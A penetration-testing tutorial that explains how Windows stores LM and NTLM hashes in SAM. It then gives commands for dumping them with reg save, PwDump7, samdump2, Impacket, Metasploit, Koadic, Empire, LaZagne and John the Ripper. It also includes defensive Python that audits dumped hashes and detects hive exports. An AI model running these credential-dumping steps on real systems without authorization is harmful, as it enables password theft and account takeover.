Credential Dumping: SAM

In this article, we learn how passwords are stored in Windows. Of the methods used to hash passwords in SAM, we will focus on LM and NTLM authentication, and then we learn how to dump these credential hashes from SAM.

Table of Contents

  • Introduction to SAM
  • How are passwords stored?
  • LM authentication
  • NTLM authentication
  • PwDump7
  • SamDump2
  • Impacket
  • Metasploit Framework
      ◦ HashDump
      ◦ credential_collector
      ◦ load_kiwi (Mimikatz)
      ◦ Invoke-PowerDump.ps1
      ◦ Get-PassHashes.ps1
  • Koadic
  • PowerShell Empire
      ◦ mimikatz/sam
      ◦ credentials/powerdump
  • PowerShell
  • LaZagne
  • Decrypting hash: John The Ripper

Introduction to SAM

SAM is short for Security Account Manager, which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored in SAM. It is the responsibility of the LSA (Local Security Authority) to verify user logins by matching the passwords against the database maintained in SAM. SAM starts running in the background as soon as Windows starts up. The SAM file is found in C:\Windows\System32\config, and the hashed passwords saved in SAM can also be found in the registry: open the registry and navigate to HKEY_LOCAL_MACHINE\SAM.

How are Passwords stored in Windows?

To know how passwords are saved in Windows, we first need to understand what LM, NTLM v1 & v2 and Kerberos are.

LM authentication

LAN Manager (LM) authentication was developed by IBM for Microsoft's Windows operating systems. The security it provides is considered hackable today. It converts the password into a hash by splitting it into two chunks of seven characters and then encrypting each chunk separately. It is not case sensitive either, which is a huge drawback: because this method converts the whole password into uppercase, an attacker running a brute-force or dictionary attack can ignore lowercase letters altogether. The key used for encryption is 56-bit DES, which can now be broken easily.

NTLM authentication

NTLM authentication was developed to secure systems once LM proved insecure over time. NTLM is based on a challenge-response mechanism. It uses three components: the nonce (challenge), the response and the authentication.

When a password is stored in Windows, NTLM hashes the password, keeps the hash and disposes of the actual password. At logon, the client sends the username to the server; the server then creates a random 16-byte numeric string, the nonce, and sends it to the client. The client encrypts the nonce using the hash of the password and sends the result back to the server; this result is called the response. These three components (nonce, username and response) are sent to the Domain Controller, which looks up the password hash in its Security Account Manager (SAM) database. The Domain Controller then checks the nonce against the response; if they match, authentication is successful.

The working of NTLM v1 and NTLM v2 is the same, although there are a few differences: NTLM v1 uses MD4 and v2 uses MD5; in v1 the C/R (challenge/response) key length is 56 bits + 56 bits + 16 bits, while v2 uses 128 bits. For the C/R algorithm, v1 uses DES (ECB mode) and v2 uses HMAC-MD5. Lastly, in v1 the C/R value length is 64 bits + 64 bits + 64 bits, while v2 uses 128 bits.

Now that we have understood these hashing systems, let's focus on how to dump them. The methods we will focus on are best suited for both internal and external pen-testing. Let's begin!

PwDump7

This tool was developed by Tarasco and you can download it from here. It extracts the SAM file from the system and dumps its credentials. To execute it, just run the following command in the command prompt after downloading:

PwDump7.exe

image

As a result, it dumps all the hashes stored in the SAM file, as shown in the image above.
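The dumpers in this article emit pwdump-style lines (user:RID:LM hash:NT hash:::). As an added example, not part of the original article and with constructed sample lines, the following parses that format and flags what an internal assessment should report first: blank passwords, accounts that still have an LM hash stored, and accounts sharing a password (identical unsalted NT hash).

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample in pwdump format (user:RID:LM hash:NT hash:::); the LM value
# for svc_backup is a placeholder, not a real hash.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:8846f7eaee8fb117ad06bdd830b7586c:::
# comment lines and malformed lines are skipped
not a valid dump line
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_pwdump(text: str) -> list:
    """Parse pwdump-style lines; returns dicts with user, rid, lm, nt (lowercase hex)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries

def audit(entries: list) -> list:
    """Return (who, finding) pairs: blank passwords, stored LM hashes, shared passwords."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "blank password"))
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored (uppercase, 7-char DES halves)"))
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:   # unsalted NT hash: equal hash = equal password
            findings.append((", ".join(users), "same password (identical NT hash)"))
    return findings

if __name__ == "__main__":
    for who, finding in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{who}: {finding}")
```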

Now we will save the SAM and SYSTEM registry hives to files on the system using the following commands:

reg save hklm\sam c:\sam
reg save hklm\system c:\system

image

We saved the hives with the above commands in order to retrieve the data from the SAM file offline.
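For the defensive side of the reg save step above, here is an added detection example (not from the original article) run over constructed process-creation records in Sysmon Event ID 1 style (User, CommandLine): it flags a reg save or reg export of the SAM or SYSTEM hive, and any command line that references the hive files under System32\config.

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 style; not real logs.
SAMPLE_EVENTS = [
    {"User": r"CORP\jdoe", "CommandLine": r"reg save hklm\sam c:\sam"},
    {"User": r"CORP\jdoe", "CommandLine": r'reg  save "HKLM\SYSTEM" C:\Temp\system.hiv'},
    {"User": r"CORP\svc", "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion"},
    {"User": r"CORP\jdoe", "CommandLine": r"cmd /c copy C:\Windows\System32\config\SAM C:\Temp\SAM"},
    {"User": r"CORP\jdoe", "CommandLine": r"notepad C:\Users\jdoe\notes.txt"},
]

# reg save / reg export of the SAM hive (hashes) or SYSTEM hive (boot key that
# decrypts them); both HKLM and HKEY_LOCAL_MACHINE spellings, any letter case.
REG_SAVE_RE = re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\b", re.IGNORECASE)
HIVE_KEY_RE = re.compile(r"\b(?:hklm|hkey_local_machine)\\(?:sam|system)\b", re.IGNORECASE)
# Direct reference to the on-disk hive files; Windows keeps them locked while
# running, so even a failed attempt is worth a look.
HIVE_FILE_RE = re.compile(r"\\system32\\config\\(?:sam|system)\b", re.IGNORECASE)

def classify(command_line: str):
    """Return a detection tag for one command line, or None if nothing matched."""
    if REG_SAVE_RE.search(command_line) and HIVE_KEY_RE.search(command_line):
        return "sam_hive_export"
    if HIVE_FILE_RE.search(command_line):
        return "sam_hive_file_access"
    return None

def detect(events: list) -> list:
    """Return (tag, user, command line) for every event that matches a rule."""
    return [(classify(e["CommandLine"]), e["User"], e["CommandLine"])
            for e in events if classify(e["CommandLine"])]

if __name__ == "__main__":
    for tag, user, cmd in detect(SAMPLE_EVENTS):
        print(f"{tag:22} {user:12} {cmd}")
```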

SamDump2

Once you have retrieved the data from SAM, you can use the SamDump2 tool to dump its hashes with the following command. Both files are needed: the SYSTEM hive holds the boot key that decrypts the hashes in the SAM hive.

samdump2 system sam

image

Impacket

Impacket's secretsdump.py can also extract all the hashes from the saved SAM and SYSTEM hives with the following command:

./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL

image

Metasploit Framework: HashDump

When you have a meterpreter session on a target, just run the hashdump command and it will dump all the hashes from the SAM file of the target system, as shown in the image below:

image

Another way to dump hashes is through the hashdump post-exploitation module that Metasploit offers. To use it, run the following set of commands:

use post/windows/gather/hashdump
set session 1
exploit

image

Metasploit Framework: credential_collector

Another way to dump credentials with Metasploit is via another built-in post-exploitation module. To use it, simply background your session and run the following commands:

use post/windows/gather/credential/credential_collector
set session 1
exploit

image

Metasploit Framework: load kiwi

The next method Metasploit offers is firing up the mimikatz module. To load mimikatz, use the load kiwi command, and then use the following command to dump the whole SAM file with mimikatz:

lsa_dump_sam

image

Hence, you have your password hashes, as you can see in the image above.

Metasploit Framework: Invoke-Powerdump.ps1

Download Invoke-Powerdump Script

This Metasploit method involves PowerShell. After getting the meterpreter session, load the PowerShell extension with the command load powershell. Then use the following set of commands to run the Invoke-PowerDump.ps1 script:

powershell_import /root/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump.ps1

image

Once the above commands have executed the script, you will have the dumped hashes, just as in the image above.

Metasploit Framework: Get-PassHashes.ps1

Download Get-PassHashes Script

Again, via meterpreter, load the PowerShell extension with the command load powershell. Then, just like in the previous method, use the following commands to execute the script and retrieve the hashes:

powershell_import Get-PassHashes.ps1
powershell_execute Get-PassHashes.ps1

image

And VOILA! All the passwords have been retrieved.

Koadic

Once you have a session in the Koadic C2, use the hashdump_sam module to get the hashes as shown below:

use hashdump_sam
execute

image

All the hashes from the SAM file will be dumped as shown in the above image.

PowerShell Empire: mimikatz/sam

Once you have a session through Empire, interact with the session and use the mimikatz/sam module to dump the credentials with the help of the following commands:

usemodule credentials/mimikatz/sam
execute

image

This module runs mimikatz and gets you all the hashes by dumping the SAM file.

PowerShell Empire: credentials/powerdump

Empire offers yet another module that dumps the credentials from the victim's system. This module does not invoke mimikatz like the previous method. To use it, type:

usemodule credentials/powerdump
execute

image

Yes!! You will have the hashes.

PowerShell

Download Invoke-Powerdump Script

This method is an excellent one for local testing, also known as internal testing. To use it, simply type the following in PowerShell:

Import-Module '<path of the powerdump script>'
Invoke-PowerDump

image

And, it will dump all the credentials for you.

LaZagne

LaZagne is an amazing tool for dumping all kinds of passwords. We have covered LaZagne in detail in a previous article; to visit it, click here. Now, to dump SAM hashes with LaZagne, just use the following command:

lazagne.exe all

image

Yay!!! All the credentials have been dumped.

Decrypting Hash: John The Ripper

John The Ripper is an amazing hash cracking tool. We have dedicated two articles to this tool; to learn more about John The Ripper, click here: part 1, part 2. Once you have dumped all the hashes from the SAM file using any of the methods given above, you just need John The Ripper to crack the hashes with the following command:

john --format=NT hash --show

image

As you can see, it reveals the password by cracking the given hash.

This article focused on dumping credentials from the Windows SAM file. Various methods have been shown, using multiple platforms, to successfully dump the credentials. To secure yourself, you first must learn how a vulnerability can be exploited and to what extent; therefore, knowing such methods and what they can do is important.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

The post Credential Dumping: SAM appeared first on Hacking Articles.
